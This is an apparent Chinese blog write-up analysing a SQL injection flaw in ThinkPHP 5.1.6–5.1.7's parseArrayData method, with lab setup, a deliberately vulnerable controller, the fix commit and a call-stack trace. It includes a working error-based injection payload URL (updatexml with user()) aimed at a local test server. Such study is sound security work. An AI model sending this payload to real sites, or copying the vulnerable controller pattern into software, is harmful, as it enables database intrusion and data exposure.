Thinkphp 5.1.7 SQL注入漏洞

时间：2020-04-19 00:53:21 阅读：137 评论：0 收藏：0 [点我收藏+]

标签：connect 删除影响前言 sql注入 strong return 原因 uil

0x00 前言

依旧是和上篇文章审计思路一致，越来越觉得代审积累经验很重要了。。还好自己没有头铁学了学php漏洞就头铁去审，哪怕仅仅是这几篇文章这几篇文章学会了debug，学会了看Github的commit记录进行漏洞定位。代审真香啊，越审越好玩。

环境

本次漏洞存在于?Mysql?类的?parseArrayData?方法中由于程序没有对数据进行很好的过滤，将数据拼接进?SQL?语句，导致?SQL注入漏洞?的产生。漏洞影响版本：?5.1.6<=ThinkPHP<=5.1.7?(非最新的?5.1.8?版本也可利用)。

composer create-project topthink/think=5.1.7 tp5.1.7
 composer.json文件：
 "require": {
        "php": ">=5.6.0",
        "topthink/framework": "5.1.7"
    },
    
    更新：执行composer update

接下来设置漏洞点和配置数据库

将?application/index/controller/Index.php?文件代码设置如下：

<?php
namespace?app\index\controller;
class?Index
{
????public?function?index()
????{
????????$username?=?request()->get(‘username/a‘);
????????db(‘users‘)->where([‘id‘?=>?1])->update([‘username‘?=>?$username]);
????????return?‘Update?success‘;
????}
}

创建数据库信息如下：

create database tpdemo;
use tpdemo;
create table users(
	id int primary key auto_increment,
	username varchar(50) not null
);
insert into users(id,username) values(1,‘wtz‘);

在?config/database.php?文件中配置数据库相关信息

开启?config/app.php?中的?app_debug?和?app_trace

漏洞分析

先看github上的版本更新
技术图片

技术图片

直接删除了default语句块，并直接删除了parseArrayData方法。
payload:

http://127.0.0.1:88/tp517/public/index.php/index/index?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0

技术图片

这里获取一个username数组get变量，传给$username，然后作为字段‘username‘的值，插入users表。
通过查看调用堆栈，我们发现了我们sql语句执行点和调用了update

技术图片

ps：Query?类的?update?方法，该方法调用了?Connection?类的?update?方法，该方法又调用了?$this->builder?的?insert?方法，这里的?$this->builder?为?\think\db\builder\Mysql?类，该类继承于?Builder?类
我们进入

技术图片